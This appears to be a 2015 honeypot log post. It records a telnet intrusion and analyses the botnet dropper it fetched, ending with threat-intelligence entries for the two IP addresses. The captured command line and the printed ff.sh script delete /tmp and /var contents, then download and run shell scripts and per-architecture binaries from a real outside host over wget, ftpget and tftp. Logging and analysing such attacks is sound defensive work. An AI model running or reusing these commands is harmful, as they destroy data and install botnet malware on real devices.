Thursday, 15 October 2015

113.126.198.158 - Telnet code execution after login, download via 158.69.203.229

BEGIN OF TELNET DATA:
2015-10-14 09:48:52
Source IP: 113.126.198.158
Country: CN RiskScore: 2.9 Malware: []
sh
shelrm -rf /tmp/* /var/*;cd /tmp || cd /var/;wget http://158.69.203.229/ff.sh;sh ff.sh;ftpget -u anonymous -p anonymous 158.69.203.229 ff2.sh ff2.sh;sh ff2.sh;tftp -r ff3.sh -g 158.69.203.229;sh ff3.sh
User: root
Pass:

END OF DATA
The first script, ff.sh, is a simple one that fetches a binary for each candidate architecture, names it busybox, and tries to run it:
#!/bin/sh
cp /bin/busybox ./
wget http://158.69.203.229/arm;cat arm >busybox;rm -f arm;chmod 777 busybox;./busybox
wget http://158.69.203.229/mips;cat mips >busybox;rm -f mips;./busybox
wget http://158.69.203.229/mipsel;cat mipsel >busybox;rm -f mipsel;./busybox
wget http://158.69.203.229/ppc;cat ppc >busybox;rm -f ppc;./busybox
wget http://158.69.203.229/sh;cat sh >busybox;rm -f sh;./busybox
The FTP server is also publicly available:
ftp> ls
227 Entering Passive Mode (158,69,203,229,209,227)
150 Opening ASCII mode data connection for file list
-rwxr-xr-x   1 root     root        41652 Oct 12 23:33 arm
-rw-r--r--   1 root     root          523 Oct 10 17:04 ff2.sh
-rwxr-xr-x   1 root     root        50743 Oct 15 03:28 find
-rwxr-xr-x   1 root     root        61572 Oct 12 23:33 mips
-rwxr-xr-x   1 root     root        61572 Oct 12 23:33 mipsel
-rwxr-xr-x   1 root     root        41128 Oct 12 23:33 ppc
-rwxr-xr-x   1 root     root        38324 Oct 12 23:33 sh
The file sh is:
sh: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
The files are available via my DRIVE share; the password is "infected".

158.69.203[.]229

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • Comment: IP is listed on SANS ISC
  • Comment: This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/158.69.203.229

113.126.198[.]158

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: IBM X-Force Exchange
  • Score: 2.9
  • Reference: https://exchange.xforce.ibmcloud.com/ip/113.126.198.158
    Dynamic Source: SANS Internet Storm Cast
  • Comment: IP is listed on SANS ISC
  • Comment: This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/113.126.198.158